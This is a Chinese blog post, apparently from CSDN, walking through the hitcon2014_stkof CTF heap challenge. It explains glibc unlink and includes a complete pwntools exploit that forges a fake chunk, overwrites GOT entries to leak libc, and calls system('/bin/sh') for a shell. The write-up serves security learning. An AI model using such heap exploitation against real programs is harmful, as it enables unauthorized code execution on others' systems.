unlink buuctf hitcon2014_stkof 个人粗浅理解

最新推荐文章于 2024-01-28 08:16:53 发布
最新推荐文章于 2024-01-28 08:16:53 发布
阅读量659 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/106104165
版权

菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份
unlink就是从双向链表中取出元素的行为
感谢网上的多篇前辈的文章,其中这篇让我收获最多

https://bbs.pediy.com/thread-247007.htm
unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用

malloc

从恰好大小合适的 large bin 中获取 chunk。

这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏洞会经常出现在它们这里的原因。

依次遍历处理 unsorted bin 时也没有使用 unlink 的。

从比请求的 chunk 所在的 bin 大的 bin 中取 chunk。

Free

后向合并,合并物理相邻低地址空闲 chunk。

前向合并,合并物理相邻高地址空闲 chunk(除了 top chunk)。

malloc_consolidate

后向合并,合并物理相邻低地址空闲 chunk。

前向合并,合并物理相邻高地址空闲 chunk(除了 top chunk)。

realloc

前向扩展,合并物理相邻高地址空闲 chunk(除了top chunk)。

关于unlink的漏洞利用效果最终是指向前方三个内存单元处

最终的效果:指向target-0x18=global[0]-0x8
global是全局变量数组,这个概念我一开始也不了解,现在稍微抓到一点边,不知道是不是所有的heap都有这个

注意:

大多数题目的setbuf()/setvbuf()函数的作用是用来关闭I/O缓冲区,本题没有关闭缓冲区,函数运行开始阶段在fgets()函数以及printf()函数运行的时候,会malloc()两块内存区域

先add4个chunk

add(0x20) #1
add(0x30) #2
add(0x80) #3
add(0x30) #4

每个chunk都有它的作用
1用来放free_got,后面修改为puts_plt和system_plt
2和3用来unlink
4用来放置/bin/sh\x00
注意:3必须不在fastbin范围中,不然free操作时不会向前合并空闲内存

修改chunk2,制造一个fake chunk,来进行unlink
具体的可以看看这篇

https://github.com/bash-c/slides/blob/master/pwn_heap/malloc-150821074656-lva1-app6891.pdf

在这里插入图片描述
在这里插入图片描述

然后free(3)
free之后我们到0x602130这去看看,
在这里插入图片描述
可以看到global[2]指向了global[2]-0x18这一步目前我只知道会这样,具体的原理还比较模糊,先记下吧
好像要unlink了才能触发global那里(大概)

然后从target-0x18开始改起,

p2 = 'a'*0x10 + p64(free_got)+p64(puts_got)
edit(2, p2) #target-0x8

在这里插入图片描述
可以看到确实修改了

然后修改global[1]的free_got为puts_plt
然后free(2)即为puts(puts_got)

p3 = p64(puts_plt)
edit(1, p3) #global[1]
free(2)     #chu fa

在这里插入图片描述
global[1]被修改了
然后free后就puts了puts_got的libc地址,以此算出libcbase

接着修改global[1]为system,将/bin/sh\x00写入global[4],然后free(4),触发sh

p4 = p64(system_addr)
edit(1, p4) #global[1]
edit(4, '/bin/sh\x00') #global[4]
free(4)     #chu fa

在这里插入图片描述

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './stkof'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 27302)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


def add(size):
    r.sendline("1")
    r.sendline(str(size))
    r.recvuntil("OK\n")
 
def free(idx):
    r.sendline("3")
    r.sendline(str(idx))
 
def edit(idx,strings):
    r.sendline("2")
    r.sendline(str(idx))
    r.sendline(str(len(strings)))
    r.send(strings)
    r.recvuntil("OK\n")

#0x602140 global[0]
target = 0x602140 + 0x10 #global[2]
fd = target - 0x18
bk = target - 0x10

add(0x20) #1
add(0x30) #2
add(0x80) #3 
add(0x30) #4 



p1 = p64(0)+p64(0x30)+p64(fd)+p64(bk)+'a'*0x10+p64(0x30)+p64(0x90) #fake chunk
edit(2, p1) 
free(3) #unlink

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
free_got = elf.got['free']
#atoi_got = elf.got['atoi']
p2 = 'a'*0x10 + p64(free_got)+p64(puts_got)
edit(2, p2) #target-0x8

p3 = p64(puts_plt)
edit(1, p3) #global[1]
free(2)     #chu fa

fun_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
info_addr('fun_addr', fun_addr)

libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')

p4 = p64(system_addr)
edit(1, p4) #global[1]
edit(4, '/bin/sh\x00') #global[4]
free(4)     #chu fa

r.interactive()
真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@linuxcool ~]# unlink test.file 与该功能相关的Linux命令:mysqldump命令 – MySQL数据库备份diffstat命令 – 显示统计数字stat命令 – 显示文件状态信息ld命令 – GUN连接器aureport命令 – 生成审计信息报表lynx命令 – 终端上的纯文本浏览器rpmbuild
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 568
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
记录unlink的原理及例题分析
m0_73954357的博客
04-12 155
实现unlink攻击的条件 1 . 可以修改next_chunk的pre_size和size位 (为了绕过第一个检查,实现合并) 2 . 不能开pie (要知道需要合并的地址,所以不能开pie) 结合题目更好理解,下面给出例题(hitcontraining_bamboobox)
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 172
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 723
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink
最新发布
2301_79326813的博客
01-28 720
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 665
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
hitcon2014_stkof
m0_73756460的博客
02-22 149
buu刷题hitcon2014_stkof【wp】
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1549
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
Linux unlink函数和删除文件的操作方法
01-09
1. unlink函数   对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。   对于软链接来说,unlink 直接删除软链接,而不...
node.js中的fs.unlink方法使用说明
10-25
主要介绍了node.js中的fs.unlink方法使用说明,本文介绍了fs.unlink的方法说明、语法、接收参数、使用实例和实现源码,需要的朋友可以参考下
2014_hitcon_stkof学习
a2590035252的博客
08-29 923
适用于和我一样的广大pwn菜鸡
2014_hitcon_stkof
Maxmalloc的博客
12-13 841
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 799
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
unlink 2014 HITCON stkof
qq_36918532的博客
01-17 2545
题目可以从buuctf下载 参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367 首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来 1.用来分配 2用来写入内容 3.用来free 4.好像没什么用 而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以
[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题
zylxixixi的博客
10-01 283
check一下开启的安全防护,并没有开启PIE 拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。 allocate函数创建一个自定义大小的堆 edit函数自定大小修改堆块的内容,容易产生堆溢出 delete函数就是free堆块 还有一个没有意义的函数 这里比较重要的点是存储堆块地址的数组地址 整体思路为: 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10 一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用s...
buuctf hitcon2014_stkof 4/100
m0_57754423的博客
02-28 139
这个题目之前做过,所有这次并没有什么大问题。 unlink exp: from pwn import * from LibcSearcher import * p = remote("node4.buuoj.cn",28398) context.log_level = "debug" context.arch = "amd64" e = ELF("./stkof") # chunk_addr = 0x602140 def add(size): p.sendline(b"1") p.sendl
把文件从临时文件夹移到指定位置使用的函数是(1 分) A.mkdir B.unlink C.move_uploaded_file D.file_exists
06-06
正确答案是 C。 ...这个函数的语法如下: ...move_uploaded_file...选项 B 中的 `unlink` 是删除文件的函数;选项 D 中的 `file_exists` 是检查文件是否存在的函数,都不是把文件从临时文件夹移到指定位置使用的函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值